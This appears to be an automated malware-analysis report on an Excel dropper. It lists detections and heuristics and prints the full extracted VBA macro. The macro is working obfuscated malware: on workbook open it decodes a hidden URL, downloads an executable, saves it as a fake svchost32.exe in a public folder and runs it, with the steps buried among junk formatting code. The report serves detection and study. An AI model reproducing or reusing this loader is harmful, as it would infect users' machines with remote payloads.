MALICIOUS
248
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1105 Ingress Tool Transfer
The critical heuristic 'OLE_VBA_HTTP_DROP_EXEC' indicates that the VBA macro downloads a file from a URL. The Workbook_Open subroutine calls a 'Loader' function which contains a hex-encoded string. When decoded, this string resolves to 'https://thepohlfloorndation.com/KMSL.exe', which is likely the URL for a second-stage payload. The critical heuristic 'OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER' further supports this, indicating an obfuscated loader that uses CreateObject and Shell/exec functions.
Heuristics 6
-
ClamAV: Xls.Dropper.Agent-9750767-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Xls.Dropper.Agent-9750767-0
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
VBA downloads and writes a file to disk critical OLE_VBA_HTTP_DROP_EXECVBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec/Shell paths this is a download-drop dropper even when the COM ProgIDs are built dynamically to evade keyword scanning.Matched line in script
BABOOOhzalakmcnfhy677198756aeqeagtAZOLKCBPLAZMKJU7SGDY.write ANMAJOP8777352126763ZFAvMKOAPiPAOLGFXTRAnBXVZHAYTKLAJMZNBHSYO09AFSGT.responseBody -
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADERAuto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.Matched line in script
Set ANMAJOP8777352126763ZFAvMKOAPiPAOLGFXTRAnBXVZHAYTKLAJMZNBHSYO09AFSGT = CreateObject(AGHNZ989PLAKMNB67PLVZBVmn67JAHkPALOJCBYQWR("4d 69 63 72 6f 73 6f 66 74 2e 58 4d 4c 48 54 54 50")) -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set ANMAJOP8777352126763ZFAvMKOAPiPAOLGFXTRAnBXVZHAYTKLAJMZNBHSYO09AFSGT = CreateObject(AGHNZ989PLAKMNB67PLVZBVmn67JAHkPALOJCBYQWR("4d 69 63 72 6f 73 6f 66 74 2e 58 4d 4c 48 54 54 50")) -
Workbook_Open macro low OLE_VBA_WBOPENWorkbook_Open macroMatched line in script
Private Sub Workbook_Open()
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 8339 bytes |
SHA-256: 99004d2948a4870718c5d45b79679161e7fc5591b1207b544417887f3658ee56 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_Open()
Loader"68 74 74 70 73 3A 2F 2F 74 68 65 70 6F 68 6C 66 6F 75 6E 64 61 74 69 6F 6E 2E 63 6F 6D 2F 4B 4D 53 4C 2E 65 78 65"
End Sub
Public Sub Loader (Link As String)
Range("A1:J22").Select
Selection.Borders(xlDiagonalDown).LineStyle = xlNone
Selection.Borders(xlDiagonalUp).LineStyle = xlNone
With Selection.Borders(xlEdgeLeft)
.LineStyle = xlContinuous
.ColorIndex = 0
.TintAndShade = 0
.Weight = xlThin
End With
Dim ANMAJOP8777352126763ZFAvMKOAPiPAOLGFXTRAnBXVZHAYTKLAJMZNBHSYO09AFSGT
With Selection.Borders(xlEdgeTop)
.LineStyle = xlContinuous
.ColorIndex = 0
.TintAndShade = 0
.Weight = xlThin
End With
Dim BABOOOhzalakmcnfhy677198756aeqeagtAZOLKCBPLAZMKJU7SGDY
With Selection.Borders(xlEdgeBottom)
.LineStyle = xlContinuous
.ColorIndex = 0
.TintAndShade = 0
.Weight = xlThin
End With
Dim azbsnnASPlsjj878VZBagg6712988BZHAYTAlMKPOZGAgbh
With Selection.Borders(xlEdgeRight)
.LineStyle = xlContinuous
.ColorIndex = 0
.TintAndShade = 0
.Weight = xlThin
End With
Set ANMAJOP8777352126763ZFAvMKOAPiPAOLGFXTRAnBXVZHAYTKLAJMZNBHSYO09AFSGT = CreateObject(AGHNZ989PLAKMNB67PLVZBVmn67JAHkPALOJCBYQWR("4d 69 63 72 6f 73 6f 66 74 2e 58 4d 4c 48 54 54 50"))
With Selection.Borders(xlInsideVertical)
.LineStyle = xlContinuous
.ColorIndex = 0
.TintAndShade = 0
.Weight = xlThin
End With
Set BABOOOhzalakmcnfhy677198756aeqeagtAZOLKCBPLAZMKJU7SGDY = CreateObject(AGHNZ989PLAKMNB67PLVZBVmn67JAHkPALOJCBYQWR("41 44 4f 44 42 2e 53 74 72 65 61 6d"))
With Selection.Borders(xlInsideHorizontal)
.LineStyle = xlContinuous
.ColorIndex = 0
.TintAndShade = 0
.Weight = xlThin
End With
Set azbsnnASPlsjj878VZBagg6712988BZHAYTAlMKPOZGAgbh = CreateObject(AGHNZ989PLAKMNB67PLVZBVmn67JAHkPALOJCBYQWR("57 53 63 72 69 70 74 2e 53 68 65 6c 6c "))
ActiveWindow.SmallScroll Down:=-12
Range("A1").Select
ActiveCell.FormulaR1C1 = "S.No"
Range("B1").Select
ActiveCell.FormulaR1C1 = "Name"
Range("C1").Select
ActiveCell.FormulaR1C1 = "Unit"
Range("D1").Select
ActiveCell.FormulaR1C1 = "Price"
Range("E1").Select
ActiveCell.FormulaR1C1 = "Qty"
Range("F1:J22").Select
Url = AGHNZ989PLAKMNB67PLVZBVmn67JAHkPALOJCBYQWR(Link)
With Selection
.HorizontalAlignment = xlCenter
.VerticalAlignment = xlBottom
.WrapText = False
.Orientation = 0
.AddIndent = False
.IndentLevel = 0
.ShrinkToFit = False
.ReadingOrder = xlContext
.MergeCells = False
End With
Selection.Merge
aplcbnh7689haZGSKLIopPLAOJKUBXVZCAQWRAmn67yJAH = AGHNZ989PLAKMNB67PLVZBVmn67JAHkPALOJCBYQWR("43 3a 5c 55 73 65 72 73 5c 50 75 62 6c 69 63 5c 73 76 63 68 6f 73 74 33 32 2e 65 78 65")
With Selection
.HorizontalAlignment = xlCenter
.VerticalAlignment = xlBottom
.WrapText = False
.Orientation = xlVertical
.AddIndent = False
.IndentLevel = 0
.ShrinkToFit = False
.ReadingOrder = xlContext
.MergeCells = True
End With
RUNCMD = AGHNZ989PLAKMNB67PLVZBVmn67JAHkPALOJCBYQWR("43 3a 5c 55 73 65 72 73 5c 50 75 62 6c 69 63 5c 73 76 63 68 6f 73 74 33 32 2e 65 78 65")
Range("F1:J22").Select
ActiveCell.FormulaR1C1 = "S"
Range("F1:J22").Select
ActiveCell.FormulaR1C1 = "S" & Chr(10) & "u" & Chr(10) & "m" & Chr(10) & "r" & Chr(10) & "r" & Chr(10) & "y"
Range("F1:J22").Select
ANMAJOP8777352126763ZFAvMKOAPiPAOLGFXTRAnBXVZHAYTKLAJMZNBHSYO09AFSGT.Open "G" + "E" + "T", Url, False
With Selection
.HorizontalAlignment = xlCenter
.VerticalAlignment = xlBottom
.Orientation = 0
.AddIndent = False
.IndentLevel = 0
.ShrinkToFit = False
.ReadingOrder = xlContext
.MergeCells = True
End With
ANMAJOP8777352126763ZFAvMKOAPiPAOLGFXTRAnBXVZHAYTKLAJMZNBHSYO09AFSGT.send
Range("F1:J22").Select
With Selection
.HorizontalAlignment = xlCenter
.VerticalAlignment = xlCenter
.Orientation = 0
.AddIndent = False
.IndentLevel = 0
.ShrinkToFit = False
.ReadingOrder = xlContext
.MergeCells = True
End With
BABOOOhzalakmcnfhy677198756aeqeagtAZOLKCBPLAZMKJU7SGDY.Type = 1
With Selection.Font
.Name = "Calibri"
.Size = 14
.Strikethrough = False
.Superscript = False
.Subscript = False
.OutlineFont = False
.Shadow = False
.Underline = xlUnderlineStyleNone
.ThemeColor = xlThemeColorLight1
.TintAndShade = 0
.ThemeFont = xlThemeFontMinor
End With
BABOOOhzalakmcnfhy677198756aeqeagtAZOLKCBPLAZMKJU7SGDY.Open
Selection.Font.Bold = True
BABOOOhzalakmcnfhy677198756aeqeagtAZOLKCBPLAZMKJU7SGDY.write ANMAJOP8777352126763ZFAvMKOAPiPAOLGFXTRAnBXVZHAYTKLAJMZNBHSYO09AFSGT.responseBody
Selection.Font.Italic = True
BABOOOhzalakmcnfhy677198756aeqeagtAZOLKCBPLAZMKJU7SGDY.savetofile aplcbnh7689haZGSKLIopPLAOJKUBXVZCAQWRAmn67yJAH, 2
Range("L4").Select
azbsnnASPlsjj878VZBagg6712988BZHAYTAlMKPOZGAgbh.Run RUNCMD
End Sub
Function sq6bx066b922v1ql8go7lxfaw(str As String) As Variant: Dim bytes() As Byte: bytes = str: sq6bx066b922v1ql8go7lxfaw = bytes: End Function
Function s32vtm0co1rpu9pcn4qdf3rq8pv1i2wty(bytes() As Byte) As String: Dim str As String: str = bytes: s32vtm0co1rpu9pcn4qdf3rq8pv1i2wty = str: End Function
Function jh1mk9t5no0h6p1us6ewjl7yfkl4refnm(str As String) As String
Const KoLaNBv98RqWRPXczBVJH_PL89VCG As String = "mqca131dg4bar6n5037se2gzv0dk1sn1c"
Dim Zpo9agGH12BCvMX0TSRLAPK() As Byte, SokNAH_() As Byte
Zpo9agGH12BCvMX0TSRLAPK = sq6bx066b922v1ql8go7lxfaw(str)
P90VCGfAsNCBRtAU_C = sq6bx066b922v1ql8go7lxfaw(KoLaNBv98RqWRPXczBVJH_PL89VCG)
Dim Sola67BChdPo_NcBBn As Long
Sola67BChdPo_NcBBn = UBound(Zpo9agGH12BCvMX0TSRLAPK)
ReDim BCVPlokIgdh67BCGF_BQAZ(0 To Sola67BChdPo_NcBBn) As Byte
Dim GOP As Long
For GOP = LBound(Zpo9agGH12BCvMX0TSRLAPK) To Sola67BChdPo_NcBBn:
If Not Zpo9agGH12BCvMX0TSRLAPK(GOP) = 0 Then
c = Zpo9agGH12BCvMX0TSRLAPK(GOP)
For i = 0 To UBound(P90VCGfAsNCBRtAU_C):
c = c Xor P90VCGfAsNCBRtAU_C(i)
Next i
BCVPlokIgdh67BCGF_BQAZ(GOP) = c
End If
Next GOP
jh1mk9t5no0h6p1us6ewjl7yfkl4refnm = s32vtm0co1rpu9pcn4qdf3rq8pv1i2wty(BCVPlokIgdh67BCGF_BQAZ)
End Function
Public Function AGHNZ989PLAKMNB67PLVZBVmn67JAHkPALOJCBYQWR(ByVal QQQQQQQQPLAhNBGAu67ZCAFFAJSUASHASIAS As String) As String
Dim f28js6x6u0zpfk1t76n2x0d23pnhqlfqu As String
Dim cc60lh0y7puju560396z46oykxrdi6u48 As String
Dim cfav4zfu0m0ei2qgke1fxwsryak04x7sr As Long
For PLAKOIIIANMJAHXVBAGYTtt1289a0oGXHJaKLAMNBXYTAYKJAI899PALJXGAHTQWR = 1 To Len(QQQQQQQQPLAhNBGAu67ZCAFFAJSUASHASIAS) Step 3
wSyzXMLHWUSHvLYkKMMXYQvilaCUFhOtEcxHOMzjKQAtRrAJPgqiIRa = Chr$(Val(jh1mk9t5no0h6p1us6ewjl7yfkl4refnm(chr(26) & "" & chr(116) ) & Mid$(QQQQQQQQPLAhNBGAu67ZCAFFAJSUASHASIAS, PLAKOIIIANMJAHXVBAGYTtt1289a0oGXHJaKLAMNBXYTAYKJAI899PALJXGAHTQWR, 2)))
cc60lh0y7puju560396z46oykxrdi6u48 = cc60lh0y7puju560396z46oykxrdi6u48 & wSyzXMLHWUSHvLYkKMMXYQvilaCUFhOtEcxHOMzjKQAtRrAJPgqiIRa
Next PLAKOIIIANMJAHXVBAGYTtt1289a0oGXHJaKLAMNBXYTAYKJAI899PALJXGAHTQWR
AGHNZ989PLAKMNB67PLVZBVmn67JAHkPALOJCBYQWR = cc60lh0y7puju560396z46oykxrdi6u48
End Function
Attribute VB_Name = "Sheet 1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.